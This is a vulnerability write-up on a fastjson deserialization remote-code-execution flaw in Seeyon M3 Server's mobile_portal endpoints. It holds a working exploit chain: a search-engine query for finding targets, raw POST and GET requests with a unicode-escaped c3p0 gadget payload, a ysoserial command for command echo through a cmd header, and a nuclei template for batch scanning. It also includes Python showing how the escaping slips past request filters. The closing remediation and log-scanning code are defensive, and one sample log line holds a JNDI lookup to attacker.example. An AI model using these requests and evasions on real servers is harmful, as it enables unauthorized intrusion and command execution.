Disclaimer:

All vulnerabilities discussed in this article have been fixed and all sensitive information has been redacted (in several layers). The article is shared purely as an experience write-up; do not act on it, and unauthorized attacks are illegal! Any direct or indirect consequences or losses caused by distributing or exploiting the information provided here are the sole responsibility of the person using it; the author accepts no liability for them.

1: Vulnerability description

Seeyon M3 Server provides a range of functional modules covering office automation, project management, document management, workflow management, scheduling and knowledge management. The product's mobile_portal interface has a fastjson deserialization vulnerability.

2: Affected versions

Seeyon M3 Server

3: Cyberspace search engine query

fofa:
title="M3-Server"

4: Reproduction

Generate the hex payload with the CommonsBeanutils1 (CB1) chain and substitute it for the HEX placeholder in the POC below.
POC:

POST /mobile_portal/api/pns/message/send/batch/6_1sp1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/json
Content-Length: 13458

[{"userMessageId":"{\"@\u0074\u0079\u0070\u0065\":\"\u0063\u006f\u006d\u002e\u006d\u0063\u0068\u0061\u006e\u0067\u0065\u002e\u0076\u0032\u002e\u0063\u0033\u0070\u0030\u002e\u0057\u0072\u0061\u0070\u0070\u0065\u0072\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0050\u006f\u006f\u006c\u0044\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\",\"\u0075\u0073\u0065\u0072\u004f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0073\u0041\u0073\u0053\u0074\u0072\u0069\u006e\u0067\":\"\u0048\u0065\u0078\u0041\u0073\u0063\u0069\u0069\u0053\u0065\u0072\u0069\u0061\u006c\u0069\u007a\u0065\u0064\u004d\u0061\u0070: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;\"}|","channelId":"111","title":"111","content":"222","deviceType":"androidphone","serviceProvider":"baidu","deviceFirm":"other"}]

The server returns 200 (success): the payload is now stored in the application's log. Next, request the /mobile_portal/api/systemLog/pns/loadLog/app.log endpoint; it reads the log back and parses the stored JSON with fastjson, which is what triggers the deserialization:

GET /mobile_portal/api/systemLog/pns/loadLog/app.log HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate

The ping command from the payload executes successfully.
To get command output back in the response, use ysoserial to generate a CommonsBeanutils chain that loads the TomcatCmdEcho in-memory echo class:
https://github.com/Y4er/ysoserial
java -jar ysoserial-main-49888d3191-1.jar CommonsBeanutils192NOCC "CLASS:TomcatCmdEcho" | hex
Replace the HEX in the POC with this output and resend the batch request.
Then, to execute a command, add a cmd header to the loadLog request; the command's output is echoed in the response:

GET /mobile_portal/api/systemLog/pns/loadLog/app.log HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
cmd: whoami
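To make the encoding used in the POC concrete, here is an added Python example (not code from the page, from Seeyon or from ysoserial) that builds the batch-send body from a hex blob in the shape shown above and then shows what a standards-compliant JSON parse on the server recovers from it. The \uXXXX escapes exist so that the raw request never contains "@type" or the c3p0 class name in plain text: the batch endpoint's JSON parser decodes them, and that decoded text is what lands in app.log for fastjson to parse on the second request. The hex blob and the blocklist function are constructed stand-ins; the trailing "|" is copied from the POC, which the page does not explain.

```python
import json
import string

# Gadget class from the page's POC: fastjson resolves "@type", instantiates the
# c3p0 class and calls setUserOverridesAsString, which deserializes the Java
# object encoded after "HexAsciiSerializedMap:".
C3P0_CLASS = "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"

# Constructed stand-in for the blob `ysoserial ... | hex` prints. Only the Java
# serialization stream header (aced0005) is real; the rest is filler, so this
# is not a working gadget chain.
SAMPLE_HEX = "aced0005" + "00" * 16

# Letters and dots are the characters hidden behind \uXXXX in the page's POC.
HIDE = set(string.ascii_letters + ".")


def escape_for_json_string(s: str, hide: set) -> str:
    """JSON-escape s for use inside a string literal, writing every character in
    `hide` as \\uXXXX. Any JSON parser decodes the escapes, so the receiving
    application sees plain text while a byte-level filter on the raw request
    never sees "@type" or the class name."""
    out = []
    for c in s:
        if c == '"':
            out.append('\\"')
        elif c == "\\":
            out.append("\\\\")
        elif c in hide:
            out.append(f"\\u{ord(c):04x}")
        else:
            out.append(c)
    return "".join(out)


def build_request_body(hex_blob: str) -> str:
    """Body of the POST to /mobile_portal/api/pns/message/send/batch/6_1sp1 in the
    POC's shape. Only userMessageId carries the payload; the other fields are
    the POC's filler values."""
    prefix = '{"@type":"%s","userOverridesAsString":"HexAsciiSerializedMap:' % C3P0_CLASS
    suffix = ';"}|'  # trailing '|' reproduced from the POC; the page does not explain it
    message_id = escape_for_json_string(prefix, HIDE) + hex_blob + escape_for_json_string(suffix, HIDE)
    filler = ('"channelId":"111","title":"111","content":"222",'
              '"deviceType":"androidphone","serviceProvider":"baidu","deviceFirm":"other"')
    return '[{"userMessageId":"' + message_id + '",' + filler + '}]'


def naive_filter_hits(text: str) -> bool:
    """A constructed byte-level blocklist of the kind the escaping slips past."""
    return "@type" in text or "c3p0" in text


def logged_message_id(body: str) -> str:
    """What the batch endpoint recovers after a standard JSON parse, i.e. the
    plain text that, per the page, ends up in app.log."""
    return json.loads(body)[0]["userMessageId"]


def parse_logged(logged: str) -> dict:
    """What fastjson is handed when loadLog re-parses the log entry (trailing
    '|' stripped). With autoType enabled, the "@type" key drives instantiation."""
    return json.loads(logged.rstrip("|"))


if __name__ == "__main__":
    body = build_request_body(SAMPLE_HEX)
    print("raw body tripped filter:", naive_filter_hits(body))       # False
    logged = logged_message_id(body)
    print("logged text tripped filter:", naive_filter_hits(logged))  # True
    print(parse_logged(logged)["@type"])
```

The point of the two filter calls is that the same string fails a pattern match on the wire and passes it once it has been through one JSON decode; a WAF or request filter that only inspects the raw body therefore has to decode JSON escapes before matching.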

5: Batch detection

id: seeyon-m3server-mobile_portal-rce
info:
  name: Seeyon M3 Server fastjson deserialization RCE
  author: fgz
  severity: critical
  description: 'A fastjson deserialization vulnerability in the mobile_portal interface of Seeyon M3 Server. A malicious payload sent to /mobile_portal/api/pns/message/send/batch/6_1sp1 is written to a log; the /mobile_portal/api/systemLog/pns/loadLog/app.log endpoint then deserializes the JSON in that log with fastjson, giving remote code execution.'
  tags: 2023,seeyon,m3server,rce
  metadata:
    max-request: 2
    fofa-query: title="M3-Server"
    verified: true
http:
  - raw:
      - |
        POST /mobile_portal/api/pns/message/send/batch/6_1sp1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Upgrade-Insecure-Requests: 1
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: none
        Sec-Fetch-User: ?1
        Content-Type: application/json

        [{"userMessageId":"{\"@\u0074\u0079\u0070\u0065\":\"\u0063\u006f\u006d\u002e\u006d\u0063\u0068\u0061\u006e\u0067\u0065\u002e\u0076\u0032\u002e\u0063\u0033\u0070\u0030\u002e\u0057\u0072\u0061\u0070\u0070\u0065\u0072\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0050\u006f\u006f\u006c\u0044\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\",\"\u0075\u0073\u0065\u0072\u004f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0073\u0041\u0073\u0053\u0074\u0072\u0069\u006e\u0067\":\"\u0048\u0065\u0078\u0041\u0073\u0063\u0069\u0069\u0053\u0065\u0072\u0069\u0061\u006c\u0069\u007a\u0065\u0064\u004d\u0061\u0070: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;\"}|","channelId":"111","title":"111","content":"222","deviceType":"androidphone","serviceProvider":"baidu","deviceFirm":"other"}]

      - |
        GET /mobile_portal/api/systemLog/pns/loadLog/app.log HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        cmd: whoami

    matchers:
      - type: dsl
        dsl:
          # The first response must report Success (payload stored); the second
          # must carry whoami output. '\\\\' reaches the DSL as '\\', i.e. one
          # literal backslash, which matches the DOMAIN\user form on Windows.
          - "status_code_1 == 200 && contains(body_1, 'Success') && status_code_2 == 200 && contains(body_2, '\\\\')"

6: Remediation
Strictly restrict access to the /mobile_portal/ endpoints and watch the vendor's site for a patch. Because the trigger is fastjson resolving "@type" from text read back out of a log, the application-side fix is to stop autoType resolution entirely: fastjson 1.2.68 and later support safeMode (ParserConfig.getGlobalInstance().setSafeMode(true)), which refuses every "@type" regardless of blocklist, and log contents should never be fed back through a JSON parser with autoType enabled.
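As an added example (not part of the page and not Seeyon's code), the detection side of the remediation: Python that scans constructed app.log lines for stored fastjson payloads, decoding \uXXXX escapes before matching so the encoded variant of "@type" is not missed, and pairs that with an access-log check for a client that both POSTs to send/batch and GETs loadLog, the two-request sequence used above. The log line formats are assumptions, as are the marker strings for gadgets other than the page's c3p0 HexAsciiSerializedMap (JdbcRowSetImpl and TemplatesImpl are other widely known fastjson gadget families).

```python
import re

# Markers of fastjson autoType abuse. HexAsciiSerializedMap / c3p0 is the gadget
# the page uses; the other two are other well-known fastjson gadget families
# (assumption: worth alerting on in the same log).
GADGET_MARKERS = (
    "HexAsciiSerializedMap",
    "com.mchange.v2.c3p0.",
    "com.sun.rowset.JdbcRowSetImpl",
    "_bytecodes",
)

SEND_PATH = "/mobile_portal/api/pns/message/send/batch/"
LOADLOG_PATH = "/mobile_portal/api/systemLog/pns/loadLog/"

_UESC = re.compile(r"\\u([0-9a-fA-F]{4})")
_TYPE_KEY = re.compile(r'"@type"\s*:\s*"([^"]+)"')
# Common Log Format prefix: client, ident, user, [timestamp], "METHOD PATH ..."
_ACCESS = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)')


def decode_unicode_escapes(s: str) -> str:
    """Undo \\uXXXX escapes so that "@\\u0074\\u0079\\u0070\\u0065" is inspected as "@type"."""
    return _UESC.sub(lambda m: chr(int(m.group(1), 16)), s)


def inspect_app_log_line(line: str):
    """Return a finding for a line carrying an @type key or a gadget marker, else None."""
    decoded = decode_unicode_escapes(line)
    type_match = _TYPE_KEY.search(decoded)
    markers = [m for m in GADGET_MARKERS if m in decoded]
    if not type_match and not markers:
        return None
    return {
        "type": type_match.group(1) if type_match else None,
        "markers": markers,
        "escaped": decoded != line,  # payload arrived with \uXXXX evasion
    }


def scan_app_log(lines):
    """(line number, finding) for every suspicious line."""
    return [(n, hit) for n, line in enumerate(lines, 1) if (hit := inspect_app_log_line(line))]


def scan_access_log(lines):
    """Client IPs that both stored a message (POST send/batch) and read it back (GET loadLog)."""
    stages = {}
    for line in lines:
        m = _ACCESS.match(line)
        if not m:
            continue
        ip, method, path = m.groups()
        if method == "POST" and path.startswith(SEND_PATH):
            stages.setdefault(ip, set()).add("store")
        elif method == "GET" and path.startswith(LOADLOG_PATH):
            stages.setdefault(ip, set()).add("trigger")
    return sorted(ip for ip, s in stages.items() if s == {"store", "trigger"})


# Constructed sample lines (not from a real M3 Server). The line layout is an
# assumption; only the JSON content mirrors what the page's POC stores.
SAMPLE_APP_LOG = r"""
2023-11-01 10:00:01 INFO PnsMessage - batch send userMessageId=abc123|channelId=111
2023-11-01 10:00:02 INFO PnsMessage - batch send userMessageId={"@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource","userOverridesAsString":"HexAsciiSerializedMap:aced0005;"}|channelId=111
2023-11-01 10:00:03 INFO PnsMessage - batch send userMessageId={"@\u0074\u0079\u0070\u0065":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.example/x"}|channelId=111
""".strip().splitlines()

SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [01/Nov/2023:10:00:01 +0800] "POST /mobile_portal/api/pns/message/send/batch/6_1sp1 HTTP/1.1" 200 27',
    '198.51.100.9 - - [01/Nov/2023:10:00:02 +0800] "GET /mobile_portal/ HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Nov/2023:10:00:03 +0800] "GET /mobile_portal/api/systemLog/pns/loadLog/app.log HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    for n, hit in scan_app_log(SAMPLE_APP_LOG):
        print(f"app.log line {n}: {hit}")
    print("store+trigger from:", scan_access_log(SAMPLE_ACCESS_LOG))
```

The access-log pairing matters because the second request carries its command in a cmd header, which ordinary access logs do not record; the POST-then-GET sequence from one client is the signal that survives.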
